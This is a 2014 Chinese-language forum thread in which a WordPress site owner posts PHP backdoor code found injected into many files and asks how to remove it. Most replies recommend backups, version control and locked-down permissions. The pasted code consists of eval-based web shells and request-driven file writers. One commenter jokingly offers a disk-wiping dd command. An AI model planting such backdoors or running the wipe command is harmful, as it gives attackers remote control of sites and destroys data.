这是一个创建于 3731 天前的主题,其中的信息可能已经有所发展或是发生改变。
eval(base64_decode($_POST['n071238']));
eval(base64_decode($_POST['n642afe']));
eval(base64_decode($_POST['n6ae4d5']));
eval(base64_decode($_POST['n78cd5a']));
eval('$v_result = '.$p_option s[PCLZIP_CB_PRE_EXTRACT].'(PCLZIP_CB_PRE_EXTRACT, $v_local_header);');
$ogygd = "42bd6c187118582ea3e338a599a329b1"; if(isset($_REQUEST['mpwr '])) { $dsir = $_REQUEST['mpwr']; eval($dsir); exit(); } if(isset($_REQUEST['tsyuw'])) { $tkirx = $_REQUEST['rvlzlo']; $jouyl = $_REQUEST['tsyuw']; $zofhgl = fopen($jouyl, 'w'); $zkvv = fwri te($zofhgl, $tkirx); fclose($zofhgl); echo $zkvv; exit(); }
$njhg = "63e9ac921222afbfe0f8cb60c5bc3069"; if(isset($_REQUEST['kdrmaio'])) { $tbrnlbk = $_REQUEST['kdrmaio']; eval($tbrnlbk); exit(); } if(isset($_REQUEST['xcjvv'])) { $tue ezzz = $_REQUEST['sjkkv']; $sjamlr = $_REQUEST['xcjvv']; $wtjfqlol = fopen($sjamlr, 'w'); $jfcn k = fwrite($wtjfqlol, $tueezzz); fclose($wtjfqlol); echo $jfcnk; exit(); }
$krglis = "b95e94407a784c065429334b68ee7bd0"; if(isset($_REQUEST[' jbpvxunm'])) { $ityq = $_REQUEST['jbpvxunm']; eval($ityq); exit(); } if(isset($_REQUEST['xsqgzp w'])) { $jqxnuchk = $_REQUEST['qmpl']; $jzwlh = $_REQUEST['xsqgzpw']; $kyiiqzo = fopen($jzwlh, 'w'); $ollxbik = fwrite($kyiiqzo, $jqxnuchk); fclose($kyiiqzo); echo $ollxbik; exit(); }
网站是wordpress
eval(base64_decode($_POST['n642afe']));
eval(base64_decode($_POST['n6ae4d5']));
eval(base64_decode($_POST['n78cd5a']));
eval('$v_result = '.$p_option s[PCLZIP_CB_PRE_EXTRACT].'(PCLZIP_CB_PRE_EXTRACT, $v_local_header);');
$ogygd = "42bd6c187118582ea3e338a599a329b1"; if(isset($_REQUEST['mpwr '])) { $dsir = $_REQUEST['mpwr']; eval($dsir); exit(); } if(isset($_REQUEST['tsyuw'])) { $tkirx = $_REQUEST['rvlzlo']; $jouyl = $_REQUEST['tsyuw']; $zofhgl = fopen($jouyl, 'w'); $zkvv = fwri te($zofhgl, $tkirx); fclose($zofhgl); echo $zkvv; exit(); }
$njhg = "63e9ac921222afbfe0f8cb60c5bc3069"; if(isset($_REQUEST['kdrmaio'])) { $tbrnlbk = $_REQUEST['kdrmaio']; eval($tbrnlbk); exit(); } if(isset($_REQUEST['xcjvv'])) { $tue ezzz = $_REQUEST['sjkkv']; $sjamlr = $_REQUEST['xcjvv']; $wtjfqlol = fopen($sjamlr, 'w'); $jfcn k = fwrite($wtjfqlol, $tueezzz); fclose($wtjfqlol); echo $jfcnk; exit(); }
$krglis = "b95e94407a784c065429334b68ee7bd0"; if(isset($_REQUEST[' jbpvxunm'])) { $ityq = $_REQUEST['jbpvxunm']; eval($ityq); exit(); } if(isset($_REQUEST['xsqgzp w'])) { $jqxnuchk = $_REQUEST['qmpl']; $jzwlh = $_REQUEST['xsqgzpw']; $kyiiqzo = fopen($jzwlh, 'w'); $ollxbik = fwrite($kyiiqzo, $jqxnuchk); fclose($kyiiqzo); echo $ollxbik; exit(); }
网站是wordpress
 |
1
feefk 2014-09-04 21:43:43 +08:00  1
不懂,帮顶。。。
|
 |
2
54dev OP 还有个问题:这些木马里,这么多参数,还有这么多文件,他们是怎么管理的,手工记是肯定 不可能的吧,
|
 |
3
Hubs 2014-09-04 21:51:13 +08:00 1
试试 阿D,百度搜一下 阿D
|
 |
4
RemRain 2014-09-04 21:52:26 +08:00
```
dd if=/dev/zero of=/ ``` 我开玩笑的,别当真 |
|
6
54dev OP |
 |
7
ai0by 2014-09-04 22:23:15 +08:00 via Android
我想知道他怎么做到感染1000多个文件
|
 |
9
raincious 2014-09-04 22:36:31 +08:00 2
@ai0by 很简单,用个正则表达式或者str_pos就行了。剩下的就是字符串插入/替换。
就像这样: https://gist.github.com/raincious/cc6067699fb86eb33353 |
 |
11
crab 2014-09-04 22:59:41 +08:00
试下能不能通过文件最后修改日期入手。
|
 |
12
izoabr 2014-09-04 23:00:20 +08:00
有备份不?别说没有哦。。。恢复
|
 |
13
0zero0 2014-09-04 23:16:17 +08:00
对,其实抵抗黑客的一个最后的绝招就是:备份!!!
这对于个人来说也是个非常好的习惯。 上面说的好像离题了,下面回答一下问题:批量去马真的太容易误杀了o(╯□╰)o |
 |
14
Automan 2014-09-04 23:27:25 +08:00
@54dev 治标不治本啊,后门不一定都有eval的,要留后门太容易了。。看看有没有备份,重新恢复一份,全站只留读权限,图片文件目录下禁止PHP执行
|
|
16
RemRain 2014-09-04 23:39:37 +08:00 1
C:\> dd if=/dev/zero of=/
Illegal command: dd. @54dev,dd 无害,可放心大胆使用 话说你的 php 是用 root 跑的么?是的话果断重装系统吧,其他帐号的话,删除帐号对应的所有文件,用备份重建。一般被侵入的话,可不止改 php 文件那么简单 |
 |
17
Mutoo 2014-09-04 23:40:29 +08:00
这时候就突显版本控制的必要性了
|
 |
18
akfish 2014-09-04 23:42:00 +08:00
有版本控制的话,直接就revert了。
lz这次杀了后,赶紧版本控制起来吧。 |
 |
21
ihacku 2014-09-05 00:23:51 +08:00 via iPad
|
 |
23
msg7086 2014-09-05 07:24:59 +08:00 via iPhone
先重装系统吧…然后再慢慢手动杀…
|
 |
24
Havee 2014-09-05 07:32:59 +08:00
曾今遇到过,排查了后发现是某地图插件引起的,在所有php文件头插入base64_decode,卸载后一切正常
楼主也试试排除下插件 |
 |
25
jedihy 2014-09-05 12:36:08 +08:00 via iPhone
这事小时候干过,看到一句话这三个字的时候还有点小激动。批量替换吧
|
Select Language